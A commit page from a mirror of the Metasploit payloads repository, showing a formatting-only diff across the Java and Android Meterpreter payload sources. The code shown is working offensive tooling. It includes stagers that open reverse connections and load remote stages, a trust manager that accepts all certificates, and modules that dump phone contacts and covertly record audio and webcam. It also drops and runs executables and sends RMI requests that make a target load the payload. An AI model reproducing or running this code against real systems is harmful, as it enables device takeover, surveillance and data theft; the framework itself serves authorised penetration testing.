github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-04-24 10:09:49 +02:00
Code Releases Activity

format all code with the default intellij java formatter

Browse Source
This commit is contained in:
Tim 2015-05-17 19:05:21 +01:00
parent 3ba13e719a
commit d1e69b2d43
95 changed files with 3306 additions and 3344 deletions

3
java/androidpayload/app/src/com/metasploit/stage/MainActivity.java

@ -3,8 +3,7 @@ package com.metasploit.stage;
import android.app.Activity;
import android.os.Bundle;
public class MainActivity extends Activity
{
public class MainActivity extends Activity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);

12
java/androidpayload/app/src/com/metasploit/stage/Payload.java

@ -45,7 +45,7 @@ public class Payload {
}
public static void startInPath(String path) {
parameters = new String[] { path };
parameters = new String[]{path};
startAsync();
}
@ -53,7 +53,7 @@ public class Payload {
if (args != null) {
File currentDir = new File(".");
String path = currentDir.getAbsolutePath();
parameters = new String[] { path };
parameters = new String[]{path};
}
int nTrials = Integer.parseInt(TRIALS.substring(4).trim());
while (!startReverseConn() && nTrials-- > 0) {
@ -114,8 +114,8 @@ public class Payload {
if (lurl.startsWith("https")) {
urlConn = (HttpsURLConnection) url.openConnection();
Class.forName("com.metasploit.stage.PayloadTrustManager")
.getMethod("useFor", new Class[] { URLConnection.class })
.invoke(null, new Object[] { urlConn });
.getMethod("useFor", new Class[]{URLConnection.class})
.invoke(null, new Object[]{urlConn});
} else {
urlConn = (HttpURLConnection) url.openConnection();
}
@ -178,7 +178,7 @@ public class Payload {
new File(dexPath).delete();
myClass.getMethod(
"start",
new Class[] { DataInputStream.class, OutputStream.class, String[].class }).invoke(stage,
new Object[] { in, out, parameters });
new Class[]{DataInputStream.class, OutputStream.class, String[].class}).invoke(stage,
new Object[]{in, out, parameters});
}
}

3
java/androidpayload/app/src/com/metasploit/stage/PayloadTrustManager.java

@ -41,6 +41,7 @@ import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import java.security.cert.X509Certificate;
/**
@ -80,7 +81,7 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
HttpsURLConnection huc = ((HttpsURLConnection) uc);
PayloadTrustManager ptm = new PayloadTrustManager();
SSLContext sc = SSLContext.getInstance("SSL");
sc.init(null, new TrustManager[] { ptm },
sc.init(null, new TrustManager[]{ptm},
new java.security.SecureRandom());
huc.setSSLSocketFactory(sc.getSocketFactory());
huc.setHostnameVerifier(ptm);

2
java/androidpayload/library/src/androidpayload/stage/Meterpreter.java

@ -39,7 +39,7 @@ public class Meterpreter implements Stage {
Class<?> myClass = classLoader.loadClass("com.metasploit.meterpreter.AndroidMeterpreter");
file.delete();
new File(dexPath).delete();
myClass.getConstructor(new Class[] {
myClass.getConstructor(new Class[]{
DataInputStream.class, OutputStream.class, String[].class, boolean.class
}).newInstance(in, out, parameters, false);
}

4
java/androidpayload/library/src/com/metasploit/meterpreter/android/dump_contacts_android.java

@ -59,7 +59,7 @@ public class dump_contacts_android implements Command {
c = Class.forName(classNameData);
PhoneUri = (Uri) c.getField(contentUri).get(PhoneUri);
Cursor pCur = cr.query(PhoneUri, null, contactId + " = ?",
new String[] { id }, null);
new String[]{id}, null);
while (pCur.moveToNext()) {
pckt.addOverflow(TLV_TYPE_CONTACT_NUMBER,
@ -70,7 +70,7 @@ public class dump_contacts_android implements Command {
c = Class.forName(classNameEmail);
EmailUri = (Uri) c.getField(contentUri).get(EmailUri);
Cursor emailCur = cr.query(EmailUri, null, contactId
+ " = ?", new String[] { id }, null);
+ " = ?", new String[]{id}, null);
while (emailCur.moveToNext()) {
pckt.addOverflow(TLV_TYPE_CONTACT_EMAIL, emailCur

1
java/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_config_sysinfo_android.java

@ -7,6 +7,7 @@ import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.TLVType;
import com.metasploit.meterpreter.command.Command;
import com.metasploit.meterpreter.stdapi.stdapi_sys_config_sysinfo;
import android.os.Build;
public class stdapi_sys_config_sysinfo_android extends

2
java/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_process_get_processes_android.java

@ -12,7 +12,7 @@ import java.io.InputStreamReader;
public class stdapi_sys_process_get_processes_android implements Command {
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
Process proc = Runtime.getRuntime().exec(new String[] {
Process proc = Runtime.getRuntime().exec(new String[]{
"sh", "-c", "ps 2>/dev/null"
});
BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));

6
java/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_audio_record_android.java

@ -44,15 +44,15 @@ public class webcam_audio_record_android extends webcam_audio_record implements
short bSamples = (AUDIO_CHANNEL_ENCODING == AudioFormat.ENCODING_PCM_16BIT) ? 16 : 8;
short nChannels = (AUDIO_CHANNEL_CONFIG == AudioFormat.CHANNEL_CONFIGURATION_MONO) ? 1 : 2;
da.writeBytes("RIFF");
da.writeInt(Integer.reverseBytes(36+fullBuffer));
da.writeInt(Integer.reverseBytes(36 + fullBuffer));
da.writeBytes("WAVE");
da.writeBytes("fmt ");
da.writeInt(Integer.reverseBytes(16)); // Sub-chunk size, 16 for PCM
da.writeShort(Short.reverseBytes((short) 1)); // AudioFormat, 1 for PCM
da.writeShort(Short.reverseBytes(nChannels));// Number of channels, 1 for mono, 2 for stereo
da.writeInt(Integer.reverseBytes(AUDIO_SAMPLE_RATE)); // Sample rate
da.writeInt(Integer.reverseBytes(AUDIO_SAMPLE_RATE*bSamples*nChannels/8)); // Byte rate, SampleRate*NumberOfChannels*BitsPerSample/8
da.writeShort(Short.reverseBytes((short)(nChannels*bSamples/8))); // Block align, NumberOfChannels*BitsPerSample/8
da.writeInt(Integer.reverseBytes(AUDIO_SAMPLE_RATE * bSamples * nChannels / 8)); // Byte rate, SampleRate*NumberOfChannels*BitsPerSample/8
da.writeShort(Short.reverseBytes((short) (nChannels * bSamples / 8))); // Block align, NumberOfChannels*BitsPerSample/8
da.writeShort(Short.reverseBytes(bSamples)); // Bits per sample
da.writeBytes("data");
da.writeInt(Integer.reverseBytes(fullBuffer));

2
java/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_list_android.java

@ -21,7 +21,7 @@ public class webcam_list_android extends webcam_audio_record implements Command
int cameraCount = 0;
try {
Method getNumberOfCamerasMethod = cameraClass.getMethod("getNumberOfCameras");
cameraCount = (Integer)getNumberOfCamerasMethod.invoke(null, (Object[])null);
cameraCount = (Integer) getNumberOfCamerasMethod.invoke(null, (Object[]) null);
} catch (NoSuchMethodException nsme) {
response.add(TLV_TYPE_WEBCAM_NAME, "Default Camera"); // Pre 2.2 device
return ERROR_SUCCESS;

2
java/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_start_android.java

@ -73,7 +73,7 @@ public class webcam_start_android extends webcam_audio_record implements Command
}
});
surfaceHolder.setType(SurfaceHolder.SURFACE_TYPE_PUSH_BUFFERS);
WindowManager windowManager = (WindowManager)context.getSystemService(Context.WINDOW_SERVICE);
WindowManager windowManager = (WindowManager) context.getSystemService(Context.WINDOW_SERVICE);
WindowManager.LayoutParams params = new WindowManager.LayoutParams(1, 1,
WindowManager.LayoutParams.TYPE_TOAST,
WindowManager.LayoutParams.FLAG_LAYOUT_IN_SCREEN | WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |

4
java/javapayload/src/main/java/com/metasploit/meterpreter/MemoryBufferURLConnection.java

@ -43,7 +43,7 @@ public class MemoryBufferURLConnection extends URLConnection {
// container with Spawn=0) and more than one of them is loading
// a copy of this class at the same time. Work around this by
// letting all of them use the same URL stream handler object.
synchronized(handlers) {
synchronized (handlers) {
// do not use the "real" class name here as the same class
// loaded in different classloader contexts is not the same
// one for Java -> ClassCastException
@ -68,7 +68,7 @@ public class MemoryBufferURLConnection extends URLConnection {
* Create a new URL from a byte array and its content type.
*/
public static URL createURL(byte[] data, String contentType) throws MalformedURLException {
synchronized(files) {
synchronized (files) {
files.add(data);
return new URL("metasploitmembuff", "", (files.size() - 1) + "/" + contentType);
}

4
java/javapayload/src/main/java/javapayload/stage/Meterpreter.java

@ -13,12 +13,12 @@ import com.metasploit.meterpreter.MemoryBufferURLConnection;
public class Meterpreter implements Stage {
public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
boolean noRedirectError = parameters[parameters.length-1].equals("NoRedirect");
boolean noRedirectError = parameters[parameters.length - 1].equals("NoRedirect");
int coreLen = in.readInt();
byte[] core = new byte[coreLen];
in.readFully(core);
URL coreURL = MemoryBufferURLConnection.createURL(core, "application/jar");
new URLClassLoader(new URL[] { coreURL }, getClass().getClassLoader()).loadClass("com.metasploit.meterpreter.Meterpreter").getConstructor(new Class[] { DataInputStream.class, OutputStream.class, boolean.class, boolean.class }).newInstance(new Object[] { in, out, Boolean.TRUE, new Boolean(!noRedirectError) });
new URLClassLoader(new URL[]{coreURL}, getClass().getClassLoader()).loadClass("com.metasploit.meterpreter.Meterpreter").getConstructor(new Class[]{DataInputStream.class, OutputStream.class, boolean.class, boolean.class}).newInstance(new Object[]{in, out, Boolean.TRUE, new Boolean(!noRedirectError)});
in.close();
out.close();
}

8
java/javapayload/src/main/java/javapayload/stage/StreamForwarder.java

@ -70,8 +70,9 @@ public class StreamForwarder extends Thread {
private final boolean closeOut;
public StreamForwarder(InputStream in, OutputStream out, OutputStream stackTraceOut) {
this(in,out,stackTraceOut,true);
this(in, out, stackTraceOut, true);
}
public StreamForwarder(InputStream in, OutputStream out, OutputStream stackTraceOut, boolean closeOut) {
this.in = in;
this.out = out;
@ -90,9 +91,10 @@ public class StreamForwarder extends Thread {
}
private static void throwWrapped(Throwable ex) {
/* #JDK1.4 */try {
/* #JDK1.4 */
try {
throw new RuntimeException(ex);
} catch (NoSuchMethodError ex2) /**/{
} catch (NoSuchMethodError ex2) /**/ {
throw new RuntimeException(ex.toString());
}
}

2
java/javapayload/src/main/java/metasploit/AESEncryption.java

@ -34,7 +34,7 @@ public class AESEncryption {
co.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(keyBytes, "AES"), new IvParameterSpec(outIV), sr);
Cipher ci = Cipher.getInstance("AES/CFB8/NoPadding");
ci.init(Cipher.DECRYPT_MODE, new SecretKeySpec(keyBytes, "AES"), new IvParameterSpec(inIV), sr);
return new Object[] {
return new Object[]{
new CipherInputStream(din, ci),
new CipherOutputStream(out, co),
};

2
java/javapayload/src/main/java/metasploit/JMXPayload.java

@ -1,5 +1,7 @@
package metasploit;
import java.io.*;
import javax.management.*;
public class JMXPayload implements JMXPayloadMBean {

36
java/javapayload/src/main/java/metasploit/Payload.java

@ -59,7 +59,7 @@ import java.util.StringTokenizer;
/**
* The main payload loader class.
*
* <p/>
* To invoke all the magic, call the {@link #main(String[])} method
* (Or use it as Main-Class in a standalone jar and double-click it).
*/
@ -69,7 +69,7 @@ public class Payload extends ClassLoader {
// Find our properties. If we are running inside the jar, they are in a resource stream called "/metasploit.dat".
Properties props = new Properties();
Class clazz = Payload.class;
String clazzFile = clazz.getName().replace('.', '/')+".class";
String clazzFile = clazz.getName().replace('.', '/') + ".class";
InputStream propsStream = clazz.getResourceAsStream("/metasploit.dat");
if (propsStream != null) {
props.load(propsStream);
@ -81,7 +81,7 @@ public class Payload extends ClassLoader {
if (executableName != null) {
File dummyTempFile = File.createTempFile("~spawn", ".tmp");
dummyTempFile.delete();
File tempDir = new File(dummyTempFile.getAbsolutePath()+".dir");
File tempDir = new File(dummyTempFile.getAbsolutePath() + ".dir");
tempDir.mkdir();
File executableFile = new File(tempDir, executableName);
writeEmbeddedFile(clazz, executableName, executableFile);
@ -99,13 +99,13 @@ public class Payload extends ClassLoader {
// write our class
File dummyTempFile = File.createTempFile("~spawn", ".tmp");
dummyTempFile.delete();
File tempDir = new File(dummyTempFile.getAbsolutePath()+".dir");
File tempDir = new File(dummyTempFile.getAbsolutePath() + ".dir");
File propFile = new File(tempDir, "metasploit.dat");
File classFile = new File(tempDir, clazzFile);
classFile.getParentFile().mkdirs();
// load ourselves via the class loader (works both on disk and from Jar)
writeEmbeddedFile(clazz, clazzFile, classFile);
if(props.getProperty("URL", "").startsWith("https:")) {
if (props.getProperty("URL", "").startsWith("https:")) {
writeEmbeddedFile(clazz, "metasploit/PayloadTrustManager.class", new File(classFile.getParentFile(), "PayloadTrustManager.class"));
}
if (props.getProperty("AESPassword", null) != null) {
@ -114,7 +114,7 @@ public class Payload extends ClassLoader {
FileOutputStream fos = new FileOutputStream(propFile);
props.store(fos, "");
fos.close();
Process proc = Runtime.getRuntime().exec(new String[] {
Process proc = Runtime.getRuntime().exec(new String[]{
getJreExecutable("java"),
"-classpath",
tempDir.getAbsolutePath(),
@ -132,7 +132,7 @@ public class Payload extends ClassLoader {
// if the process is still running). Note that delete()
// will only delete empty directories, so we have to delete
// everything else first
File[] files = new File[] {
File[] files = new File[]{
classFile, classFile.getParentFile(), propFile, tempDir
};
for (int i = 0; i < files.length; i++) {
@ -150,10 +150,10 @@ public class Payload extends ClassLoader {
if (!IS_DOS) {
try {
try {
File.class.getMethod("setExecutable", new Class[] {boolean.class}).invoke(droppedFile, new Object[] { Boolean.TRUE});
File.class.getMethod("setExecutable", new Class[]{boolean.class}).invoke(droppedFile, new Object[]{Boolean.TRUE});
} catch (NoSuchMethodException ex) {
// ok, no setExecutable method, call chmod and wait for it
Runtime.getRuntime().exec(new String[] {"chmod", "+x", droppedExecutable}).waitFor();
Runtime.getRuntime().exec(new String[]{"chmod", "+x", droppedExecutable}).waitFor();
}
} catch (Exception ex) {
// try to continue anyway, we have nothing to lose
@ -163,7 +163,7 @@ public class Payload extends ClassLoader {
// now execute the executable.
// tempdir may contain spaces, so do not use the String variant of exec!
Runtime.getRuntime().exec(new String[] {droppedExecutable});
Runtime.getRuntime().exec(new String[]{droppedExecutable});
// Linux and other Unices allow removing files while they are in use
if (!IS_DOS) {
@ -190,7 +190,7 @@ public class Payload extends ClassLoader {
URLConnection uc = new URL(url).openConnection();
// load the trust manager via reflection, to avoid loading
// it when it is not needed (it requires Sun Java 1.4+)
Class.forName("metasploit.PayloadTrustManager").getMethod("useFor", new Class[] {URLConnection.class}).invoke(null, new Object[] {uc});
Class.forName("metasploit.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
in = uc.getInputStream();
} else
in = new URL(url).openStream();
@ -214,13 +214,13 @@ public class Payload extends ClassLoader {
if (aesPassword != null) {
// load the crypto code via reflection, to avoid loading
// it when it is not needed (it requires Sun Java 1.4+ or JCE)
Object[] streams = (Object[])Class.forName("metasploit.AESEncryption").getMethod("wrapStreams", new Class[] {InputStream.class, OutputStream.class, String.class}).invoke(null, new Object[] {in, out, aesPassword});
Object[] streams = (Object[]) Class.forName("metasploit.AESEncryption").getMethod("wrapStreams", new Class[]{InputStream.class, OutputStream.class, String.class}).invoke(null, new Object[]{in, out, aesPassword});
in = (InputStream) streams[0];
out = (OutputStream) streams[1];
}
// build the stage parameters, if any
StringTokenizer stageParamTokenizer = new StringTokenizer("Payload -- "+props.getProperty("StageParameters", ""), " ");
StringTokenizer stageParamTokenizer = new StringTokenizer("Payload -- " + props.getProperty("StageParameters", ""), " ");
String[] stageParams = new String[stageParamTokenizer.countTokens()];
for (int i = 0; i < stageParams.length; i++) {
stageParams[i] = stageParamTokenizer.nextToken();
@ -230,12 +230,12 @@ public class Payload extends ClassLoader {
}
private static void writeEmbeddedFile(Class clazz, String resourceName, File targetFile) throws FileNotFoundException, IOException {
InputStream in = clazz.getResourceAsStream("/"+resourceName);
InputStream in = clazz.getResourceAsStream("/" + resourceName);
FileOutputStream fos = new FileOutputStream(targetFile);
byte[] buf = new byte[4096];
int len;
while ((len = in.read(buf)) != -1) {
fos.write(buf,0,len);
fos.write(buf, 0, len);
}
fos.close();
}
@ -256,10 +256,10 @@ public class Payload extends ClassLoader {
length = in.readInt();
} while (length > 0);
} else {
clazz = Class.forName("javapayload.stage."+embeddedStageName);
clazz = Class.forName("javapayload.stage." + embeddedStageName);
}
final Object stage = clazz.newInstance();
clazz.getMethod("start", new Class[] { DataInputStream.class, OutputStream.class, String[].class }).invoke(stage, new Object[] { in, out, stageParameters });
clazz.getMethod("start", new Class[]{DataInputStream.class, OutputStream.class, String[].class}).invoke(stage, new Object[]{in, out, stageParameters});
} catch (final Throwable t) {
t.printStackTrace(new PrintStream(out));
}
@ -382,6 +382,6 @@ public class Payload extends ClassLoader {
root = File.separator;
path = path.substring(1);
}
return new String[] {root, path};
return new String[]{root, path};
}
}

13
java/javapayload/src/main/java/metasploit/PayloadServlet.java

@ -4,25 +4,28 @@ import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
import java.lang.Thread;
public class PayloadServlet extends HttpServlet implements Runnable {
public void run() {
try {
metasploit.Payload.main(new String[] {""});
} catch (Exception e) {}
metasploit.Payload.main(new String[]{""});
} catch (Exception e) {
}
}
protected void doGet(HttpServletRequest req, HttpServletResponse res)
throws ServletException, java.io.IOException
{
throws ServletException, java.io.IOException {
PrintWriter out = res.getWriter();
try {
Thread t = new Thread(this);
t.start();
} catch(Exception e) { };
} catch (Exception e) {
}
;
out.close();
}

3
java/javapayload/src/main/java/metasploit/PayloadTrustManager.java

@ -41,6 +41,7 @@ import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import java.security.cert.X509Certificate;
/**
@ -78,7 +79,7 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
HttpsURLConnection huc = ((HttpsURLConnection) uc);
PayloadTrustManager ptm = new PayloadTrustManager();
SSLContext sc = SSLContext.getInstance("SSL");
sc.init(null, new TrustManager[] { ptm }, new java.security.SecureRandom());
sc.init(null, new TrustManager[]{ptm}, new java.security.SecureRandom());
huc.setSSLSocketFactory(sc.getSocketFactory());
huc.setHostnameVerifier(ptm);
}

2
java/javapayload/src/main/java/metasploit/RMILoader.java

@ -15,7 +15,7 @@ public class RMILoader extends ClassLoader implements Serializable {
public Object readResolve() throws ObjectStreamException {
try {
String[] classes = new String[] {
String[] classes = new String[]{
"metasploit/Payload.class",
"metasploit/RMIPayload.class"
};

2
java/javapayload/src/main/java/rmi/RMICaptureServer.java

@ -19,7 +19,7 @@ public class RMICaptureServer {
Thread t = new Thread(new Runnable() {
public void run() {
try {
RMISender.main(new String[] {"file:./rmidummy.jar", "localhost", "11099"});
RMISender.main(new String[]{"file:./rmidummy.jar", "localhost", "11099"});
} catch (UnmarshalException ex) {
// expected
} catch (Exception ex) {

8
java/javapayload/src/main/java/rmi/RMIReplaySender.java

@ -14,7 +14,7 @@ public class RMIReplaySender {
File rmipacket = new File("build/rmipacket");
System.out.println(rmipacket.length());
DataInputStream in = new DataInputStream(new FileInputStream(rmipacket));
byte[] packetBytes = new byte[(int)rmipacket.length()];
byte[] packetBytes = new byte[(int) rmipacket.length()];
in.readFully(packetBytes);
in.close();
@ -22,11 +22,11 @@ public class RMIReplaySender {
String dummyURL = "file:./rmidummy.jar";
String packetStr = new String(packetBytes, "ISO-8859-1");
int pos = packetStr.indexOf((char)0+""+(char)dummyURL.length() + dummyURL);
packetStr = packetStr.substring(0, pos+1) + (char)url.length() + url + packetStr.substring(pos + 2 + dummyURL.length());
int pos = packetStr.indexOf((char) 0 + "" + (char) dummyURL.length() + dummyURL);
packetStr = packetStr.substring(0, pos + 1) + (char) url.length() + url + packetStr.substring(pos + 2 + dummyURL.length());
packetBytes = packetStr.getBytes("ISO-8859-1");
Socket s = new Socket(args[1],Integer.parseInt(args[2]));
Socket s = new Socket(args[1], Integer.parseInt(args[2]));
OutputStream out = s.getOutputStream();
out.write("JRMI\0\2K\0\0\0\0\0\0".getBytes("ISO-8859-1"));
out.write(packetBytes);

7
java/javapayload/src/main/java/rmi/RMISender.java

@ -18,13 +18,14 @@ public class RMISender {
public static void main(String[] args) throws Exception {
Endpoint endpoint = new TCPEndpoint(args[1], Integer.parseInt(args[2]));
URLClassLoader ucl = new URLClassLoader(new URL[] {new URL(args[0])});
URLClassLoader ucl = new URLClassLoader(new URL[]{new URL(args[0])});
Object loader = ucl.loadClass("metasploit.RMILoader").newInstance();
UnicastRef2 ref = new UnicastRef2(new LiveRef(new ObjID(ObjID.DGC_ID), endpoint, false));
DGCImpl_Stub stub = new DGCImpl_Stub(ref);
Field f = stub.getClass().getDeclaredField("operations");;
Field f = stub.getClass().getDeclaredField("operations");
;
f.setAccessible(true);
RemoteCall remotecall = ref.newCall(stub, (Operation[])f.get(stub), 0, 0xf6b6898d8bf28643L);
RemoteCall remotecall = ref.newCall(stub, (Operation[]) f.get(stub), 0, 0xf6b6898d8bf28643L);
ObjectOutput objectoutput = remotecall.getOutputStream();
objectoutput.writeObject(new ObjID[0]);
objectoutput.writeLong(0);

6
java/javapayload/src/test/java/javapayload/stage/MeterpreterTest.java

@ -36,7 +36,7 @@ public class MeterpreterTest extends TestCase {
// build dummy Meterpreter stage
ByteArrayOutputStream baos = new ByteArrayOutputStream();
DataOutputStream dos = new DataOutputStream(baos);
StreamForwarder.forward(MeterpDummy.class.getResourceAsStream(MeterpDummy.class.getSimpleName()+".class"), baos);
StreamForwarder.forward(MeterpDummy.class.getResourceAsStream(MeterpDummy.class.getSimpleName() + ".class"), baos);
String meterpDummy = new String(baos.toByteArray(), "ISO-8859-1").replace("MeterpDummy", "Meterpreter");
baos.reset();
JarOutputStream jos = new JarOutputStream(baos);
@ -57,7 +57,7 @@ public class MeterpreterTest extends TestCase {
// test payload with output redirection enabled
baos.reset();
new Meterpreter().start(new DataInputStream(new ByteArrayInputStream(payload)), baos, new String[] {"Payload", "--", "Meterpreter"});
new Meterpreter().start(new DataInputStream(new ByteArrayInputStream(payload)), baos, new String[]{"Payload", "--", "Meterpreter"});
DataInputStream in = new DataInputStream(new ByteArrayInputStream(baos.toByteArray()));
byte[] roundtripData = new byte[4096];
in.readFully(roundtripData);
@ -68,7 +68,7 @@ public class MeterpreterTest extends TestCase {
// test payload with output redirection disabled
baos.reset();
new Meterpreter().start(new DataInputStream(new ByteArrayInputStream(payload)), baos, new String[] {"Payload", "--", "Meterpreter", "NoRedirect"});
new Meterpreter().start(new DataInputStream(new ByteArrayInputStream(payload)), baos, new String[]{"Payload", "--", "Meterpreter", "NoRedirect"});
in = new DataInputStream(new ByteArrayInputStream(baos.toByteArray()));
roundtripData = new byte[4096];
in.readFully(roundtripData);

4
java/javapayload/src/test/java/javapayload/stage/ShellTest.java

@ -14,14 +14,14 @@ public class ShellTest extends TestCase {
String commands = "echo MagicToken\r\nexit\r\n";
DataInputStream in = new DataInputStream(new ByteArrayInputStream(commands.getBytes("ISO-8859-1")));
ByteArrayOutputStream out = new ByteArrayOutputStream();
shell.start(in, out, new String[] {"Payload", "--", "Shell"});
shell.start(in, out, new String[]{"Payload", "--", "Shell"});
int timeout = 5000;
while (out.size() == 0 && timeout > 0) {
Thread.sleep(100);
timeout -= 100;
}
String shellOutput = new String(out.toByteArray(), "ISO-8859-1");
Assert.assertTrue("MagicToken missing in shell output: "+shellOutput, shellOutput.contains("MagicToken"));
Assert.assertTrue("MagicToken missing in shell output: " + shellOutput, shellOutput.contains("MagicToken"));
Assert.assertEquals(-1, in.read());
}
}

39
java/javapayload/src/test/java/metasploit/PayloadTest.java

@ -46,8 +46,8 @@ public class PayloadTest extends TestCase {
public void testReverseTCP() throws Exception {
ServerSocket ss = new ServerSocket(0);
final Properties metasploitDat = new Properties();
metasploitDat.setProperty("LHOST", ""+InetAddress.getLocalHost().getHostAddress());
metasploitDat.setProperty("LPORT", ""+ss.getLocalPort());
metasploitDat.setProperty("LHOST", "" + InetAddress.getLocalHost().getHostAddress());
metasploitDat.setProperty("LPORT", "" + ss.getLocalPort());
ExecutorService tempThread = Executors.newFixedThreadPool(1);
Future handle = tempThread.submit(new Callable() {
public Object call() throws Exception {
@ -71,8 +71,8 @@ public class PayloadTest extends TestCase {
final String KEY = "ThisIsMyUnitTest";
ServerSocket ss = new ServerSocket(0);
final Properties metasploitDat = new Properties();
metasploitDat.setProperty("LHOST", ""+InetAddress.getLocalHost().getHostAddress());
metasploitDat.setProperty("LPORT", ""+ss.getLocalPort());
metasploitDat.setProperty("LHOST", "" + InetAddress.getLocalHost().getHostAddress());
metasploitDat.setProperty("LPORT", "" + ss.getLocalPort());
metasploitDat.setProperty("AESPassword", KEY);
ExecutorService tempThread = Executors.newFixedThreadPool(1);
Future handle = tempThread.submit(new Callable() {
@ -114,14 +114,15 @@ public class PayloadTest extends TestCase {
int port = ss.getLocalPort();
ss.close();
final Properties metasploitDat = new Properties();
metasploitDat.setProperty("LPORT", ""+port);
metasploitDat.setProperty("LPORT", "" + port);
ExecutorService tempThread = Executors.newFixedThreadPool(1);
Future handle = tempThread.submit(new Callable() {
public Object call() throws Exception {
return runPayload(metasploitDat, null);
}});
}
});
Socket s;
for(int retry = 0;; retry++) {
for (int retry = 0; ; retry++) {
try {
s = new Socket(InetAddress.getLocalHost(), port);
break;
@ -140,8 +141,8 @@ public class PayloadTest extends TestCase {
public void testSpawnReverseTCP() throws Exception {
ServerSocket ss = new ServerSocket(0);
final Properties metasploitDat = new Properties();
metasploitDat.setProperty("LHOST", ""+InetAddress.getLocalHost().getHostAddress());
metasploitDat.setProperty("LPORT", ""+ss.getLocalPort());
metasploitDat.setProperty("LHOST", "" + InetAddress.getLocalHost().getHostAddress());
metasploitDat.setProperty("LPORT", "" + ss.getLocalPort());
metasploitDat.setProperty("Spawn", "2");
Assert.assertNull(runPayload(metasploitDat, null));
ss.setSoTimeout(10000);
@ -151,19 +152,19 @@ public class PayloadTest extends TestCase {
}
private Object runPayload(final Properties metasploitDat, Class extraClass) throws IllegalAccessException, InvocationTargetException, NoSuchMethodException, ClassNotFoundException, Exception {
return setUpClassLoader(metasploitDat, extraClass).loadClass("metasploit.Payload").getMethod("main", new Class[] {String[].class}).invoke(null, new Object[] {new String[0]});
return setUpClassLoader(metasploitDat, extraClass).loadClass("metasploit.Payload").getMethod("main", new Class[]{String[].class}).invoke(null, new Object[]{new String[0]});
}
private URLClassLoader setUpClassLoader(Properties metasploitDat, Class extraClass) throws Exception {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
StreamForwarder.forward(Payload.class.getResourceAsStream(Payload.class.getSimpleName()+".class"), baos);
StreamForwarder.forward(Payload.class.getResourceAsStream(Payload.class.getSimpleName() + ".class"), baos);
byte[] payloadClass = baos.toByteArray(), instrumentedPayloadClass = null;
baos.reset();
// load the uninstrumented class as resource when running unter Cobertura so that Spawn will work
try {
ClassLoader loader = Class.forName("net.sourceforge.cobertura.coveragedata.CoverageDataFileHandler").getClassLoader();
if (loader instanceof URLClassLoader && ((URLClassLoader) loader).getURLs().length == 1) {
File jarFile = new File(((URLClassLoader)loader).getURLs()[0].toURI());
File jarFile = new File(((URLClassLoader) loader).getURLs()[0].toURI());
if (jarFile.getName().startsWith("surefirebooter")) {
File origFile = new File(jarFile.getParentFile().getParentFile(), "classes/metasploit/Payload.class");
StreamForwarder.forward(new FileInputStream(origFile), baos);
@ -172,10 +173,11 @@ public class PayloadTest extends TestCase {
baos.reset();
}
}
} catch (ClassNotFoundException ex) {}
} catch (ClassNotFoundException ex) {
}
byte[] extraClassBytes = null;
if (extraClass != null) {
StreamForwarder.forward(extraClass.getResourceAsStream(extraClass.getSimpleName()+".class"), baos);
StreamForwarder.forward(extraClass.getResourceAsStream(extraClass.getSimpleName() + ".class"), baos);
extraClassBytes = baos.toByteArray();
baos.reset();
}
@ -185,18 +187,19 @@ public class PayloadTest extends TestCase {
jos.putNextEntry(new ZipEntry("metasploit/Payload.class"));
jos.write(payloadClass);
if (extraClass != null) {
jos.putNextEntry(new ZipEntry(extraClass.getName().replace('.','/')+".class"));
jos.putNextEntry(new ZipEntry(extraClass.getName().replace('.', '/') + ".class"));
jos.write(extraClassBytes);
}
jos.close();
byte[] payloadJar = baos.toByteArray();
final byte[] classToDefine = instrumentedPayloadClass;
return new URLClassLoader(new URL[] {MemoryBufferURLConnection.createURL(payloadJar, "application/jar")}) {
return new URLClassLoader(new URL[]{MemoryBufferURLConnection.createURL(payloadJar, "application/jar")}) {
{
if (classToDefine != null) {
defineClass(null, classToDefine, 0, classToDefine.length);
}
}
protected synchronized Class loadClass(String name, boolean resolve) throws ClassNotFoundException {
// do not load classes from metasploit package from parent class loader!
if (name.startsWith("metasploit.")) {
@ -229,10 +232,10 @@ public class PayloadTest extends TestCase {
private void handleSocketCommunication(OutputStream out, InputStream in) throws Exception {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
StreamForwarder.forward(Stage.class.getResourceAsStream(Stage.class.getSimpleName()+".class"), baos, false);
StreamForwarder.forward(Stage.class.getResourceAsStream(Stage.class.getSimpleName() + ".class"), baos, false);
byte[] stageClass = baos.toByteArray();
baos.reset();
StreamForwarder.forward(DummyStage.class.getResourceAsStream(DummyStage.class.getSimpleName()+".class"), baos);
StreamForwarder.forward(DummyStage.class.getResourceAsStream(DummyStage.class.getSimpleName() + ".class"), baos);
byte[] dummyStageClass = baos.toByteArray();
baos.close();
DataOutputStream dos = new DataOutputStream(out);

23
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Channel.java

@ -21,12 +21,9 @@ public class Channel {
/**
* Create a new "generic" channel.
*
* @param meterpreter
* The meterpreter this channel should be assigned to.
* @param in
* Input stream of the channel
* @param out
* Output stream of the channel, if any
* @param meterpreter The meterpreter this channel should be assigned to.
* @param in Input stream of the channel
* @param out Output stream of the channel, if any
*/
